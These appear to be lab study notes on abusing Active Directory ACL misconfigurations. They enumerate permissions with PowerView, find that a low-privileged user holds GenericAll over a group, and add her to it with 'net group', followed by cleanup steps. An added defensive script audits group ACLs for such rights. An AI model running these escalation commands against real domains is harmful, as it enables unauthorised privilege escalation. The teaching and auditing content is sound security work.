Active Directory is a hierarchical database that contains Active Directory Objects. These include users, computers, applications, printers and shared folders.
Recap
When a user tries to access an Active Directory Object it sends its access token, which consists of the user's identity and group memberships. The target object then checks the access token against its list of permissions (the Access Control List). If an entry matches the user's identity and grants the requested permission, access is granted.
Permissions
Active Directory has a wealth of permissions, but from an attacker's standpoint we are focused on the following:
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit the ACEs applied to the object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to, for example, a group
Enumerating ACE's - PowerView
Access Control Entries (ACEs) make up the Access Control List; they are themselves Active Directory Objects. We can query them with PowerView.
PS C:\Tools> Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553
CORP\RAS and IAS Servers
Converting All SID's from an Object- PowerView
Above we converted SIDs one at a time, which is tedious. Instead let's convert all the SIDs found on an AD Object at once. We will query "Management Department" for the principals holding "GenericAll" permissions.
PS C:\Tools> "S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
CORP\Domain Admins
CORP\stephanie
BUILTIN\Account Operators
Local System
CORP\Enterprise Admins
NOTE: We see that stephanie has "GenericAll" permissions for this Object. A low-privileged user should not hold such permissions, so this must be a configuration mistake!
GenericAll is the most powerful ACL permission in Active Directory.
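As an added example (not from the original notes), here is the defender's side of the same check: an audit of the group's ACL using the built-in ActiveDirectory (RSAT) module instead of PowerView, flagging any principal outside an expected list that holds takeover rights. The group name, the expected-principal list and the CORP domain are assumptions taken from the output above.

```powershell
# Added example, not from the original notes: audit a group's ACL for dangerous rights
# granted to principals outside an expected allow-list. Uses the ActiveDirectory module
# (AD: PSDrive) rather than PowerView. Group name, allow-list and domain are assumptions.
Import-Module ActiveDirectory

$GroupName = 'Management Department'
# Principals we expect to hold strong rights over this group (assumed for this demo)
$Expected  = @('CORP\Domain Admins', 'CORP\Enterprise Admins',
               'BUILTIN\Account Operators', 'NT AUTHORITY\SYSTEM')
# Rights that allow taking over the object, its DACL, or its membership
$Dangerous = 'GenericAll|GenericWrite|WriteOwner|WriteDacl|Self|ExtendedRight'

$group = Get-ADGroup -Identity $GroupName
$acl   = Get-Acl -Path ("AD:\" + $group.DistinguishedName)

$findings = foreach ($ace in $acl.Access) {
    # Only Allow ACEs can grant access; Deny ACEs are not a finding
    if ($ace.AccessControlType -ne 'Allow') { continue }
    if ($ace.ActiveDirectoryRights.ToString() -notmatch $Dangerous) { continue }
    # IdentityReference is resolved to DOMAIN\name where the SID is known;
    # unresolvable SIDs stay as S-1-5-... strings and are reported as-is
    $who = $ace.IdentityReference.Value
    if ($Expected -contains $who) { continue }
    [pscustomobject]@{
        Group     = $GroupName
        Principal = $who
        Rights    = $ace.ActiveDirectoryRights
        Inherited = $ace.IsInherited
    }
}

if ($findings) {
    Write-Warning "Unexpected rights on '$GroupName' (e.g. a plain user with GenericAll):"
    $findings | Format-Table -AutoSize
} else {
    Write-Host "No unexpected dangerous rights found on '$GroupName'."
}
```

Run against the group above this would list CORP\stephanie with GenericAll, which is exactly the misconfiguration the notes go on to abuse. Membership changes made with net group, including the cleanup step, are still recorded on the domain controller as group membership change events (4728/4729 for global security groups), so the audit and those events together cover both the weak ACE and its use.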
Exploiting Vulnerability
Adding New User
Above we discovered a misconfiguration in the "Management Department" AD Object, but the group currently has only one member: jen. Since stephanie has GenericAll on the group, we can use her permissions to add herself to the group.
PS C:\Tools> net group "Management Department" stephanie /add /domain
The request will be processed at a domain controller for domain corp.com.
The command completed successfully.
Verify
We can verify that stephanie was indeed added with PowerView; alternatively, net.exe works as well.
PS C:\Tools> Get-NetGroup "Management Department" | select member
member
------
{CN=jen,CN=Users,DC=corp,DC=com, CN=stephanie,CN=Users,DC=corp,DC=com}
Cleanup
After we're done we always want to clean up. Let's remove stephanie from the group.
PS C:\Tools> net group "Management Department" stephanie /del /domain
The request will be processed at a domain controller for domain corp.com.
The command completed successfully.